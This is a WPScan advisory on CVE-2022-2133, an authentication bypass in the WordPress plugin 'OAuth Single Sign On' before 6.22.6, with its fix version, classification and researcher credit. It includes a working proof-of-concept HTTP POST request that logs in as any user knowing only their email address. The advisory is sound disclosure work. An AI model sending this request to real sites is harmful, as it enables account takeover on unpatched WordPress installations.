WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

OAuth Single Sign On < 6.22.6 - Authentication Bypass

Description

The plugin doesn't validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user's email address.

Proof of Concept

POST / HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Connection: close

option=mooauth&[email protected]

Affects Plugins

miniorange-login-with-eve-online-google-facebook
Fixed in version 6.22.6

References

CVE
CVE-2022-2133
URL
https://lana.codes/lanavdb/12bb3c02-45f1-4ce8-8a5a-8b44352cf7fc/

Classification

Type

AUTHBYPASS

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
e76939ca-180f-4472-a26a-e0c36cfd32de

Timeline

Publicly Published

2022-06-27 (about 11 months ago)

Added

2022-06-27 (about 11 months ago)

Last Updated

2023-04-01 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin